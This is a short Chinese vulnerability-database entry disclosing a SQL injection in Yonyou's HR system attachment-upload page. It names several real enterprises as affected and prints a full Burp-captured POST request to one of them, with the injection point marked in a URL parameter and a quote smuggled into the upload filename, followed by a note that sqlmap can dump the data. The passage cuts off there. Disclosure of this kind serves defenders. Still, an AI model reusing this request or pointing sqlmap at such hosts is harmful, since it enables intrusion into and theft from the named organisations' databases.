用友人力资源系统通用SQL注入

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 用友人力资源系统通用SQL注入 很多大型的企业中招 ### 详细说明: 如中国海洋石油总公司、顺德农商银行、湖北能源集团股份有限公司、华信信托股份有限公司等 漏洞出现在上传的页面: burpsuite抓包保存为post.txt: ``` POST /hrss/attach.upload.d?appName=PSNBASDOC_RM&pkAttach=0001V11000000001NLAX* HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Referer: http://nc.hbny.com.cn:9090/hrss/pub/UploadAttach.jsp?appName=PSNBASDOC_RM&pkAttach=0001V11000000001NLAX Accept-Language: zh-CN User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Content-Type: multipart/form-data; boundary=---------------------------7df36929c057c Accept-Encoding: gzip, deflate Host: nc.hbny.com.cn:9090 Content-Length: 507 Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: JSESSIONID=0000wqBKC1wT2dZGLDkt-fcdLZZ:194gm84q8 -----------------------------7df36929c057c Content-Disposition: form-data; name="txtFileName"; filename="0.png'" Content-Type: image/x-png GIF89aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa -----------------------------7df36929c057c-- ``` 可以直接用sqlmap跑数据:...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息